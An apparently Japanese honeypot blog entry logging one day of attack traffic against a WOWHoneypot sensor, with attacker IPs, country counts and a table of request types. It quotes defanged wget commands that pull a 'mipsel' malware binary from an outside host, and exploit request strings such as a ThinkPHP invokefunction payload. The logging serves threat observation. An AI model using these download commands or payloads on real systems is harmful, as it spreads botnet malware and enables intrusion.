23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(224日目)

2019/10/26(土)

トータルは4121件でした。

ハンティングログは以下です。

50.39.101[.]156 wget+hxxp[:]//185.172.110[.]220/mipsel
176.113.255[.]129 wget+hxxp[:]//185.172.110[.]220/mipsel
68.145.57[.]104 wget+hxxp[:]//185.172.110[.]220/mipsel
42.188.219[.]206 wget+hxxp[:]//185.172.110[.]220/mipsel
185.141.40[.]30 wget+hxxp[:]//185.172.110[.]220/mipsel

www.virustotal.com
www.virustotal.com

IPのロケーション別の件数は以下です。

ブラジル 4012
スイス 45
中国 19
アメリ 16
オランダ 8
ロシア 7
ウクライナ 2
トルコ 1
ギリシャ 1
イタリア 1
グルジア 1
カナダ 1
南アフリカ 1
マレーシア 1
インドネシア 1
アルゼンチン 1
シンガポール 1
台湾 1
南アフリカ 1

f:id:sec23:20191103165723p:plain

件数 概要 リクエス
4047 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
39 アクセス GET /
6 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
6 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
5 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
5 Linksys ルータの E シリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
3 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
2 不正中継の試み CONNECT www.baidu.com:443
1 DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 POST /editBlackAndWhiteList
1 不正中継の調査 GET hxxp[:]//checkip.dyndns.org/
1 サイト構成の調査 GET /sitemap.xml
1 不明 GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status
1 クローリング GET /robots.txt
1 アクセス GET /favicon.ico
1 キャッシュページの調査 GET /cgi-sys/defaultwebpage.cgi
1 SSL証明書発行時の一時ファイルの調査 GET /.well-known/security.txt